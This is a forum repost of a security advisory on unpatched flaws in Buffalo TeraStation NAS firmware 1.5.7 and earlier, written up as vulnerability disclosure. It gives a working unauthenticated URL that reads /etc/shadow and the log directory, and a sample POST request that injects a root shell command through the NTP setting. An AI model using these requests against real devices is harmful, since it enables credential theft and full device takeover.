Praetorian503 Posted January 31, 2013 Report Posted January 31, 2013 Buffalo TeraStation TS-Series with firmware versions 1.5.7 and below suffer from file disclosure and command injection vulnerabilities.**************************************************************Title: Buffalo TeraStation TS-Series multiple vulnerabilitiesVersion affected: firmware version <= 1.5.7Vendor: http://www.buffalotech.com/products/network-storageDiscovered by: Andrea FabriziEmail: andrea.fabrizi@gmail.comWeb: http://www.andreafabrizi.itTwitter: @andreaf83Status: unpatched**************************************************************Buffalo's TeraStation network attached storage (NAS) solutions offercentralized storage and backup for home, small office and businessneeds.The firmware is based on Linux ARM and most of the internal softwareis written using Perl.The vulnerabilities that I found allows any unauthenticated attackerto access arbitrary files on the NAS filesystem and execute systemcommands with root privileges.Tested successfully on TS-XL, TS-RXL, TS-WXL, TS-HTGL/R5, TS-XEL withthe latest firmware installed (v1.57). Surely other versions with thesame firmware are vulnerable.1]======== sync.cgi unauthenticated arbitrary file download ========Requesting an unprotected cgi, it's possible, for an unauthenticateduser, to download any system file, included /etc/shadow, that containsthe password shadows for the application/system users./cgi-bin/sync.cgi?gSSS=foo&gRRR=foo&gPage=information&gMode=log&gType=save&gKey=/etc/shadowMoreover, using the key "all" it's possible to download the entire/var/log directory:/cgi-bin/sync.cgi?gSSS=foo&gRRR=foo&gPage=information&gMode=log&gType=save&gKey=all2]======== dynamic.pl NTP command injection ========This vulnerability allows authenticated users to execute arbitrarycommands on the system with root privileges.This is a sample request:#####################################POST /dynamic.pl HTTP/1.1Content-Length: 89Cookie: webui_session_admin=xxxxxxxxxxxxxxxxxxxxxx_en_0bufaction=setDTSettings&dateMethod=on&ip=www.google.it%26%26[COMMAND]>/tmp/output&syncFreq=1d#####################################It's possible to view the command output using the previousvulnerability (reading the /tmp/output file).Source: PacketStorm Quote